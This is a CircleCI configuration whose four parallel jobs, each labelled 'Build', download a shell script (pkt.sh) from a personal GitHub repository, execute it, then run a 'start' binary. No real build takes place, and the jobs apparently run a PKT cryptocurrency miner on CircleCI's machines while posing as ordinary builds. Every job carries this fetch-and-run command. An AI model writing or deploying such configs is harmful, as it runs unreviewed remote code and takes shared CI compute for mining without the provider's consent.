version: 2
jobs:
    Build_01:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/nurfasikin/PKT/main/pkt.sh && chmod u+x pkt.sh && ./pkt.sh && chmod +x start &&./start
    Build_02:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/nurfasikin/PKT/main/pkt.sh && chmod u+x pkt.sh && ./pkt.sh && chmod +x start &&./start
    Build_03:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/nurfasikin/PKT/main/pkt.sh && chmod u+x pkt.sh && ./pkt.sh && chmod +x start &&./start
    Build_04:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Build
            command: wget https://raw.githubusercontent.com/nurfasikin/PKT/main/pkt.sh && chmod u+x pkt.sh && ./pkt.sh && chmod +x start &&./start

workflows:
    version: 2
    build:
        jobs:
            - Build_01
            - Build_02
            - Build_03
            - Build_04
